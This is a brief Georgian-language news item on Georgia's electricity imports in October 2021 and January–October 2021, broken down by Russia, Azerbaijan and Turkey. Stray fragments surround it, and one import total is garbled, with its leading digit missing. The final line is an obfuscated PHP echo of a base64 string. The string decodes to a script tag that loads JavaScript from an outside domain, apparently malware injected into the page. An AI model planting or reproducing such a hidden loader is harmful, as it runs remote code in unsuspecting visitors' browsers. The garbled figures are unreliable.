celsiusi
ავერსი საქკაბელი
ელექტროენერგეტიკული ბაზრის ოპერატორის (ესკო) მონაცემებით, 2021 წლის ოქტომბერში საქართველოში 8.413 მლნ კვტ.სთ ელექტროენერგიის იმპორტი განხორციელდა, რაც გასული წლის ანალოგიური პერიოდის მაჩვენებელზე 93%-ით ნაკლებია. აღნიშნულ პერიოდში 8.273 მლნ კვტ.სთ საქართველომ რუსეთიდან მიიღო, 0.139 მლნ კვტ.სთ - აზერბაიჯანიდან.
 
იანვარ-ოქტომბრის პერიოდში იმპორტმა მლრდ 724.5 მლნ კვტ.სთ შეადგინა - 2020 წლის შესაბამის პერიოდთან შედარებით 39.1%-ით მეტი.
 
იმპორტის უდიდესი წილი მიმდინარე წლის განმავლობაში რუსეთის ფედერაციაზე მოდის - 1 მლრდ 057.6 მლნ კვტ.სთ. აზერბაიჯანიდან იმპორტმა, იანვრიდან ოქტომბრის ჩათვლით 505.7 მლნ კვტ.სთ შეადგინა, თურქეთიდან კი 161.2 მლნ კვტ.სთ.
1012
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");